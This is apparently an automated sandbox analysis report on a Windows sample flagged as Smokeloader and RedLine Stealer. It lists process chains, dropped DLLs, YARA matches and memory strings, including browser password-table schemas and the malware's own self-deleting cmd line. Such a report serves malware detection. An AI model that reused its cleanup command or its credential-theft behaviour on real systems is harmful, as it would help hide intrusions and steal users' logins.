Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D15DA30	12_2_6D15DA30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1E9A50	12_2_6D1E9A50
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13DAB0	12_2_6D13DAB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D061AE0	12_2_6D061AE0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1AF510	12_2_6D1AF510
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C7500	12_2_6D0C7500
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D075510	12_2_6D075510
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D099590	12_2_6D099590
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0E55F0	12_2_6D0E55F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0ED410	12_2_6D0ED410
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D149430	12_2_6D149430

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\FBGIDHCAAKEB\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: String function: 6D1ED930 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: String function: 6D199F30 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: String function: 6D1EDAE0 appears 75 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: String function: 6D083620 appears 93 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: String function: 6D1E09D0 appears 317 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: String function: 6D089B10 appears 103 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: String function: 004087A0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: String function: 0040F5A0 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: String function: 02128A07 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: String function: 0212F807 appears 139 times

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468

Uses 32bit PE files

Source: xvJv1BpknZ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@14/36@11/10

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D0C0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

12_2_6D0C0300

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

Code function: 0_2_0215614A CreateToolhelp32Snapshot,Module32First,

0_2_0215614A

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Code function: 7_2_0042B20E CoCreateInstance,

7_2_0042B20E

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\etrtabd

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7992
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\5876.tmp

Jump to behavior

Source: xvJv1BpknZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\EE6.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.12.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.12.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.12.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.12.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.12.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.12.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.12.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: katDDA4.tmp, katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.12.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: 5876.exe, 00000007.00000003.1760839883.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1744609509.0000000002C75000.00000004.00000800.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1743544115.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2250873454.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2250873454.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2233073953.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, GIEBAE.12.dr, BFIIID.12.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.12.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.12.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: xvJv1BpknZ.exe

Virustotal: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\xvJv1BpknZ.exe "C:\Users\user\Desktop\xvJv1BpknZ.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\etrtabd C:\Users\user\AppData\Roaming\etrtabd
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5876.exe C:\Users\user\AppData\Local\Temp\5876.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EE6.exe C:\Users\user\AppData\Local\Temp\EE6.exe
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Process created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmp
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5876.exe C:\Users\user\AppData\Local\Temp\5876.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EE6.exe C:\Users\user\AppData\Local\Temp\EE6.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Process created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: iphlpapi.dll	Jump to behavior
